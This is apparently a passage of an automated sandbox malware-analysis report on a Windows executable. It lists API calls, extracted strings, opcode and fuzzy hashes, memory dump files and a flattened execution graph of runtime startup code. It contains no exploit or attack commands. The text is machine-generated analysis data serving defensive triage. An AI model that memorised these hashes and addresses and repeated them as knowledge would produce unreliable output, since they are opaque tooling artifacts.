                                  • Instruction ID: 364616d8ed0603465e2fd38375d3f390278470db12d45952a5037d4a64d0ebb8
                                  • Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                  • Instruction Fuzzy Hash: CA4192A2A0868247FB65BF25B54037DE6A0AF80FB0FD54130DF5986B95CF2CF94186A0
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B4021
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B4083
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B40BD
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B40E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                  • String ID:
                                  • API String ID: 1557788787-0
                                  • Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                  • Instruction ID: af07289128c1e174a3b0369d10720769ab5956d0b57282c6d4783bb50a539e10
                                  • Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                  • Instruction Fuzzy Hash: AF215071A0879587E620BF12744006DF6A4EB44FE0B888134EF9EA3B95DF3CF4528754
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B095A
                                  • SetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B09C2
                                  • SetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B09D8
                                  • abort.LIBCMT ref: 00007FF7C01B09DE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$abort
                                  • String ID:
                                  • API String ID: 1447195878-0
                                  • Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                  • Instruction ID: 13d6145982dbdb7c19a831208e9748fedefe3957909f0585040a03860bf229fa
                                  • Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                  • Instruction Fuzzy Hash: FE018B90A086064BFA5A7F22B29513DD2915F44FB0F800538ED2EC2BC6EF6CF80042B4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                  • Instruction ID: 6c87613dc8fd006a55d80cc82974fc9265708d096d8f48492d2ddd8a92593039
                                  • Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                  • Instruction Fuzzy Hash: A1E0C960E0960683EA086F71B81D13DD2A1AF89F61F88403DCC2E86350EF3DB08547A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID: e+000$gfff
                                  • API String ID: 3215553584-3030954782
                                  • Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                  • Instruction ID: a7f931131b252cd74708759b717c8dc7f63d460f77359efda3d7911669105ba3
                                  • Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                  • Instruction Fuzzy Hash: 3E5105A2B187C187E7259F35A84136DFA91BB40FB0F889231CA98C7BD5CF2CE4448750
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                  • String ID: SIZE
                                  • API String ID: 449872665-3243624926
                                  • Opcode ID: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                  • Instruction ID: d163a8f7094328fb8a873a08ef8f7f6205c9c8e224056ffc7d2decdca9be42de
                                  • Opcode Fuzzy Hash: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                  • Instruction Fuzzy Hash: B241D062A1878297EA10AF14F4403ADE350EB81BB4F854335EA9C827D6EF3CE640C791
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                  • String ID: C:\Users\user\Desktop\ywXeiXEvP2.exe
                                  • API String ID: 3307058713-2363190917
                                  • Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                  • Instruction ID: 59ef60c728c0ef0c23d45d9ff7969a16fe68d9c0fb8bf8891c3d2ef65ba1df98
                                  • Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                  • Instruction Fuzzy Hash: 13418C32A086668BEB15AF62B4400BDE794EB44FE4B844039EA0D87B85DF3CF45187A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide_snwprintf
                                  • String ID: $%s$@%s
                                  • API String ID: 2650857296-834177443
                                  • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                  • Instruction ID: 5b323c57ec3ec219da6361aa08e8bcb66942ad37be77d5c6e482b67e6586c923
                                  • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                  • Instruction Fuzzy Hash: D431B272B18A4687EA10AF65F4406ADE3A0EB44FA4F851132EE0D97B95DF3CF605C790
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DialogParamVisibleWindow
                                  • String ID: GETPASSWORD1
                                  • API String ID: 3157717868-3292211884
                                  • Opcode ID: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                  • Instruction ID: f22f37671f0cecf74005111a922065b993e954f80725db96f65e47a0d77a35aa
                                  • Opcode Fuzzy Hash: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                  • Instruction Fuzzy Hash: BB315A21A0C68287E615AF12B4581BCE7A1EB46FA4FC80035E95D83795CF6CF554C3F0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileHandleType
                                  • String ID: @
                                  • API String ID: 3000768030-2766056989
                                  • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                  • Instruction ID: c6b64c20ce76f52d8dee9fdc583db0465c7315e107532f93bb2af8e1a60da96c
                                  • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                  • Instruction Fuzzy Hash: AF21A462E0864282EB64BF24A49013DE651EB49F74F641335EB6E877D4CF39F485D390
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C01A57EE), ref: 00007FF7C01A788C
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C01A57EE), ref: 00007FF7C01A78D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                  • Instruction ID: 879a5df0ca9638c0f7e58c34fca54f01861b22f41e75fb9564f8ca29c455c541
                                  • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                  • Instruction Fuzzy Hash: AB111922618B8582EA259F15F84426DF7A1FB88F94F984230DE8D47B58DF3CE651CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FindHandleModuleResource
                                  • String ID: RTL
                                  • API String ID: 3537982541-834975271
                                  • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                  • Instruction ID: 3ecf265360061aa68d5fd90b3e4c438d1372d1c75df78fa6cef5c9e26d3b2f08
                                  • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                  • Instruction Fuzzy Hash: 1FD01291F0970683FF197F727484779D2505B19F51F890038CD1D46750EF6DA2848BA5

                                  Execution Graph

                                  Execution Coverage:9.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.9%
                                  Total number of Nodes:1462
                                  Total number of Limit Nodes:26
                                  execution_graph 23076 8d1385 82 API calls 3 library calls 24748 8fac0e 27 API calls CatchGuardHandler 24803 8f5780 QueryPerformanceFrequency QueryPerformanceCounter 24750 8ea89d 78 API calls 24751 8dea98 FreeLibrary 24804 8f2397 48 API calls 23152 8ed997 23154 8ed89b 23152->23154 23153 8edf59 ___delayLoadHelper2@8 19 API calls 23153->23154 23154->23153 24753 8e7090 114 API calls 24754 8ecc90 70 API calls 24805 8ea990 97 API calls 24806 8e9b90 GdipCloneImage GdipAlloc 23157 8ed891 19 API calls ___delayLoadHelper2@8 24807 8f9b90 21 API calls 2 library calls 24756 8ee4a2 38 API calls 2 library calls 24758 8d96a0 79 API calls 24810 8fe9a0 51 API calls 24761 8f76bd 52 API calls 2 library calls 24812 8f79b7 55 API calls _free 24763 8d16b0 84 API calls 23178 8f90b0 23186 8fa56f 23178->23186 23182 8f90cc 23183 8f90d9 23182->23183 23194 8f90e0 11 API calls 23182->23194 23185 8f90c4 23195 8fa458 23186->23195 23189 8fa5ae TlsAlloc 23192 8fa59f 23189->23192 23190 8eec4a CatchGuardHandler 5 API calls 23191 8f90ba 23190->23191 23191->23185 23193 8f9029 20 API calls 2 library calls 23191->23193 23192->23190 23193->23182 23194->23185 23196 8fa488 23195->23196 23198 8fa484 23195->23198 23196->23189 23196->23192 23198->23196 23200 8fa4a8 23198->23200 23202 8fa4f4 23198->23202 23199 8fa4b4 GetProcAddress 23201 8fa4c4 __crt_fast_encode_pointer 23199->23201 23200->23196 23200->23199 23201->23196 23203 8fa515 LoadLibraryExW 23202->23203 23204 8fa50a 23202->23204 23205 8fa54a 23203->23205 23206 8fa532 GetLastError 23203->23206 23204->23198 23205->23204 23208 8fa561 FreeLibrary 23205->23208 23206->23205 23207 8fa53d LoadLibraryExW 23206->23207 23207->23205 23208->23204 23209 8fa3b0 23210 8fa3bb 23209->23210 23212 8fa3e4 23210->23212 23213 8fa3e0 23210->23213 23215 8fa6ca 23210->23215 23222 8fa410 DeleteCriticalSection 23212->23222 23216 8fa458 _abort 5 API calls 23215->23216 23217 8fa6f1 23216->23217 23218 8fa70f InitializeCriticalSectionAndSpinCount 23217->23218 23219 8fa6fa 23217->23219 23218->23219 23220 8eec4a CatchGuardHandler 5 API calls 23219->23220 23221 8fa726 23220->23221 23221->23210 23222->23213 24764 8f1eb0 6 API calls 4 library calls 24765 8ea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24767 8eeac0 27 API calls pre_c_initialization 24816 8febc1 21 API calls __vswprintf_c_l 24817 8e97c0 10 API calls 24769 8f9ec0 21 API calls 24818 8fb5c0 GetCommandLineA GetCommandLineW 23245 8d10d5 23250 8d5bd7 23245->23250 23251 8d5be1 __EH_prolog 23250->23251 23257 8db07d 23251->23257 23253 8d5bed 23263 8d5dcc GetCurrentProcess GetProcessAffinityMask 23253->23263 23258 8db087 __EH_prolog 23257->23258 23264 8dea80 80 API calls 23258->23264 23260 8db099 23265 8db195 23260->23265 23264->23260 23266 8db1a7 ___scrt_fastfail 23265->23266 23269 8e0948 23266->23269 23272 8e0908 GetCurrentProcess GetProcessAffinityMask 23269->23272 23273 8db10f 23272->23273 23273->23253 23274 8eead2 23275 8eeade ___DestructExceptionObject 23274->23275 23300 8ee5c7 23275->23300 23277 8eeae5 23279 8eeb0e 23277->23279 23380 8eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23277->23380 23287 8eeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23279->23287 23311 8f824d 23279->23311 23283 8eeb2d ___DestructExceptionObject 23284 8eebad 23319 8ef020 23284->23319 23287->23284 23381 8f7243 38 API calls 2 library calls 23287->23381 23295 8eebd9 23297 8eebe2 23295->23297 23382 8f764a 28 API calls _abort 23295->23382 23383 8ee73e 13 API calls 2 library calls 23297->23383 23301 8ee5d0 23300->23301 23384 8eed5b IsProcessorFeaturePresent 23301->23384 23303 8ee5dc 23385 8f2016 23303->23385 23305 8ee5e1 23310 8ee5e5 23305->23310 23394 8f80d7 23305->23394 23308 8ee5fc 23308->23277 23310->23277 23313 8f8264 23311->23313 23312 8eec4a CatchGuardHandler 5 API calls 23314 8eeb27 23312->23314 23313->23312 23314->23283 23315 8f81f1 23314->23315 23318 8f8220 23315->23318 23316 8eec4a CatchGuardHandler 5 API calls 23317 8f8249 23316->23317 23317->23287 23318->23316 23444 8ef350 23319->23444 23322 8eebb3 23323 8f819e 23322->23323 23446 8fb290 23323->23446 23325 8f81a7 23326 8eebbc 23325->23326 23450 8fb59a 38 API calls 23325->23450 23328 8ed5d4 23326->23328 23571 8e00cf 23328->23571 23332 8ed5f3 23620 8ea335 23332->23620 23334 8ed5fc 23624 8e13b3 GetCPInfo 23334->23624 23336 8ed606 ___scrt_fastfail 23337 8ed619 GetCommandLineW 23336->23337 23338 8ed628 23337->23338 23339 8ed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23337->23339 23627 8ebc84 23338->23627 23340 8d400a _swprintf 51 API calls 23339->23340 23342 8ed70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23340->23342 23638 8eaded LoadBitmapW 23342->23638 23345 8ed636 OpenFileMappingW 23349 8ed64f MapViewOfFile 23345->23349 23350 8ed696 CloseHandle 23345->23350 23346 8ed6a0 23632 8ed287 23346->23632 23352 8ed68d UnmapViewOfFile 23349->23352 23353 8ed660 __vswprintf_c_l 23349->23353 23350->23339 23352->23350 23356 8ed287 2 API calls 23353->23356 23358 8ed67c 23356->23358 23358->23352 23359 8e8835 8 API calls 23360 8ed76a DialogBoxParamW 23359->23360 23361 8ed7a4 23360->23361 23362 8ed7bd 23361->23362 23363 8ed7b6 Sleep 23361->23363 23365 8ed7cb 23362->23365 23668 8ea544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23362->23668 23363->23362 23366 8ed7ea DeleteObject 23365->23366 23367 8ed7ff DeleteObject 23366->23367 23368 8ed806 23366->23368 23367->23368 23369 8ed837 23368->23369 23373 8ed849 23368->23373 23669 8ed2e6 6 API calls 23369->23669 23372 8ed83d CloseHandle 23372->23373 23665 8ea39d 23373->23665 23374 8ed883 23375 8f757e GetModuleHandleW 23374->23375 23376 8eebcf 23375->23376 23376->23295 23377 8f76a7 23376->23377 23876 8f7424 23377->23876 23380->23277 23381->23284 23382->23297 23383->23283 23384->23303 23386 8f201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23385->23386 23398 8f310e 23386->23398 23389 8f2029 23389->23305 23391 8f2031 23392 8f203c 23391->23392 23412 8f314a DeleteCriticalSection 23391->23412 23392->23305 23440 8fb73a 23394->23440 23397 8f203f 8 API calls 3 library calls 23397->23310 23399 8f3117 23398->23399 23401 8f3140 23399->23401 23402 8f2025 23399->23402 23413 8f3385 23399->23413 23418 8f314a DeleteCriticalSection 23401->23418 23402->23389 23404 8f215c 23402->23404 23433 8f329a 23404->23433 23406 8f2166 23411 8f2171 23406->23411 23438 8f3348 6 API calls try_get_function 23406->23438 23408 8f217f 23409 8f218c 23408->23409 23439 8f218f 6 API calls ___vcrt_FlsFree 23408->23439 23409->23391 23411->23391 23412->23389 23419 8f3179 23413->23419 23416 8f33bc InitializeCriticalSectionAndSpinCount 23417 8f33a8 23416->23417 23417->23399 23418->23402 23420 8f31a9 23419->23420 23421 8f31ad 23419->23421 23420->23421 23424 8f31cd 23420->23424 23426 8f3219 23420->23426 23421->23416 23421->23417 23423 8f31d9 GetProcAddress 23425 8f31e9 __crt_fast_encode_pointer 23423->23425 23424->23421 23424->23423 23425->23421 23427 8f3241 LoadLibraryExW 23426->23427 23432 8f3236 23426->23432 23428 8f325d GetLastError 23427->23428 23429 8f3275 23427->23429 23428->23429 23430 8f3268 LoadLibraryExW 23428->23430 23431 8f328c FreeLibrary 23429->23431 23429->23432 23430->23429 23431->23432 23432->23420 23434 8f3179 try_get_function 5 API calls 23433->23434 23435 8f32b4 23434->23435 23436 8f32cc TlsAlloc 23435->23436 23437 8f32bd 23435->23437 23437->23406 23438->23408 23439->23411 23443 8fb753 23440->23443 23441 8eec4a CatchGuardHandler 5 API calls 23442 8ee5ee 23441->23442 23442->23308 23442->23397 23443->23441 23445 8ef033 GetStartupInfoW 23444->23445 23445->23322 23447 8fb299 23446->23447 23449 8fb2a2 23446->23449 23451 8fb188 23447->23451 23449->23325 23450->23325 23452 8f8fa5 _abort 38 API calls 23451->23452 23453 8fb195 23452->23453 23471 8fb2ae 23453->23471 23455 8fb19d 23480 8faf1b 23455->23480 23458 8fb1b4 23458->23449 23459 8f8518 __onexit 21 API calls 23460 8fb1c5 23459->23460 23461 8fb1f7 23460->23461 23487 8fb350 23460->23487 23464 8f84de _free 20 API calls 23461->23464 23464->23458 23465 8fb1f2 23497 8f895a 20 API calls __dosmaperr 23465->23497 23467 8fb23b 23467->23461 23498 8fadf1 26 API calls 23467->23498 23468 8fb20f 23468->23467 23469 8f84de _free 20 API calls 23468->23469 23469->23467 23472 8fb2ba ___DestructExceptionObject 23471->23472 23473 8f8fa5 _abort 38 API calls 23472->23473 23478 8fb2c4 23473->23478 23475 8fb348 ___DestructExceptionObject 23475->23455 23478->23475 23479 8f84de _free 20 API calls 23478->23479 23499 8f8566 38 API calls _abort 23478->23499 23500 8fa3f1 EnterCriticalSection 23478->23500 23501 8fb33f LeaveCriticalSection _abort 23478->23501 23479->23478 23481 8f3dd6 __fassign 38 API calls 23480->23481 23482 8faf2d 23481->23482 23483 8faf4e 23482->23483 23484 8faf3c GetOEMCP 23482->23484 23485 8faf65 23483->23485 23486 8faf53 GetACP 23483->23486 23484->23485 23485->23458 23485->23459 23486->23485 23488 8faf1b 40 API calls 23487->23488 23489 8fb36f 23488->23489 23492 8fb3c0 IsValidCodePage 23489->23492 23494 8fb376 23489->23494 23496 8fb3e5 ___scrt_fastfail 23489->23496 23490 8eec4a CatchGuardHandler 5 API calls 23491 8fb1ea 23490->23491 23491->23465 23491->23468 23493 8fb3d2 GetCPInfo 23492->23493 23492->23494 23493->23494 23493->23496 23494->23490 23502 8faff4 GetCPInfo 23496->23502 23497->23461 23498->23461 23500->23478 23501->23478 23508 8fb02e 23502->23508 23511 8fb0d8 23502->23511 23505 8eec4a CatchGuardHandler 5 API calls 23507 8fb184 23505->23507 23507->23494 23512 8fc099 23508->23512 23510 8fa275 __vswprintf_c_l 43 API calls 23510->23511 23511->23505 23513 8f3dd6 __fassign 38 API calls 23512->23513 23514 8fc0b9 MultiByteToWideChar 23513->23514 23516 8fc0f7 23514->23516 23524 8fc18f 23514->23524 23518 8f8518 __onexit 21 API calls 23516->23518 23521 8fc118 __vsnwprintf_l ___scrt_fastfail 23516->23521 23517 8eec4a CatchGuardHandler 5 API calls 23519 8fb08f 23517->23519 23518->23521 23526 8fa275 23519->23526 23520 8fc189 23531 8fa2c0 20 API calls _free 23520->23531 23521->23520 23523 8fc15d MultiByteToWideChar 23521->23523 23523->23520 23525 8fc179 GetStringTypeW 23523->23525 23524->23517 23525->23520 23527 8f3dd6 __fassign 38 API calls 23526->23527 23528 8fa288 23527->23528 23532 8fa058 23528->23532 23531->23524 23534 8fa073 __vswprintf_c_l 23532->23534 23533 8fa099 MultiByteToWideChar 23535 8fa0c3 